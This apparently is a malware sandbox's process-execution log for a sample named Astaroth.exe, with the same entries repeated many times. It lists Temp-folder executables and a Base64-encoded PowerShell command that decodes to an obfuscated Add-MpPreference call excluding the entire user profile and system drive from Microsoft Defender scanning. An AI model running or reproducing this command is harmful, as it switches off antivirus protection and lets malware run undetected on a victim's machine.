"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AcwB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAbgBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAbgB1ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\system.exe

"C:\Users\Admin\AppData\Local\Temp\system.exe"

C:\Users\Admin\AppData\Local\Temp\Astaroth.exe

"C:\Users\Admin\AppData\Local\Temp\Astaroth.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

